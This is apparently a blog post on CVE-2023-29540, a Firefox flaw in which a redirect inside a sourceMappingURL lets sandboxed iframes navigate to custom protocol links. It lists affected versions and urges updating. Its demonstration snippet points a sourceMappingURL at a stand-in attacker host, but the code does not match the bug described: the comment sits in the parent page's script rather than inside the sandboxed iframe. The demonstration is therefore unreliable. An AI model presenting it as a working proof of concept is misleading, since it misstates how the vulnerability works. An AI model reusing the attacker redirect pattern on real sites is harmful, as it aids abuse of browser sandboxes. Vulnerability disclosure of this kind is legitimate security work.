CVE-2023-29540 - Exploiting the Firefox Source Mapping URL Vulnerability Involving Redirects in Sandboxed iframes

A recent security vulnerability (CVE-2023-29540) has been discovered affecting Firefox for Android < 112, Firefox < 112, and Focus for Android < 112. The vulnerability involves the use of a redirect embedded into sourceMappingUrls that could allow for navigation to external protocol links in sandboxed iframes without the support of allow-top-navigation-to-custom-protocols. This blog post will delve into the details of this exploit, explaining how it works and providing a code snippet to demonstrate its usage.

Original References

For the complete details and specifications regarding this vulnerability, please refer to the Mozilla Security Advisory links provided below:

1. Mozilla Advisory for Firefox
2. Mozilla Advisory for Firefox for Android
3. Mozilla Advisory for Focus for Android

Exploit Details

To understand how this exploit works, we must first look at how sourceMappingUrls are used. In general, source mapping URLs are metadata used to map code found within minified (or compressed) JavaScript files back to their original uncompressed versions. This mapping is required for debugging purposes, as it allows developers to view and understand the source code more easily.

Now, let's delve into the vulnerability itself. By embedding a redirect within a sourceMappingUrl, an attacker can force navigation to an external protocol link, even when the iframe is sandboxed and missing the required allow-top-navigation-to-custom-protocols attribute. To demonstrate this exploit, let's use the following code snippet:

<html>
<head>
    <script>
        // Victim's site code
        console.log('Hello, World!');

        //# sourceMappingURL=https://evil.example.org/redirect-to-custom-protocol.js.map
    </script>
</head>
<body>
    <iframe sandbox="allow-scripts" src="exploited.html"></iframe>
</body>
</html>

This code snippet shows an HTML file containing the vulnerable script tag with an embedded redirect within the sourceMappingUrl. When this HTML file is loaded in an iframe, the exploit will be triggered, forcing navigation to an external protocol link (defined by the attacker) without the required allow-top-navigation-to-custom-protocols attribute.

Mitigation

To protect your applications against this vulnerability, you must update your Firefox browser, Firefox for Android, and Focus for Android to the latest versions specified in the Mozilla Security Advisories. By updating your applications, they will include the necessary patches to prevent this exploit from functioning:

Conclusion

CVE-2023-29540 is a critical security vulnerability affecting Firefox for Android < 112, Firefox < 112, and Focus for Android < 112. By exploiting this vulnerability, an attacker can force navigation to external protocol links in sandboxed iframes, even without the required allow-top-navigation-to-custom-protocols attribute. To protect your applications from this exploit, it is crucial to update your Firefox browser, Firefox for Android, and Focus for Android to the latest patched versions as specified in the Mozilla Security Advisories. Stay vigilant and stay updated!

Timeline

Published on: 06/02/2023 17:15:00 UTC
Last modified on: 06/09/2023 03:56:00 UTC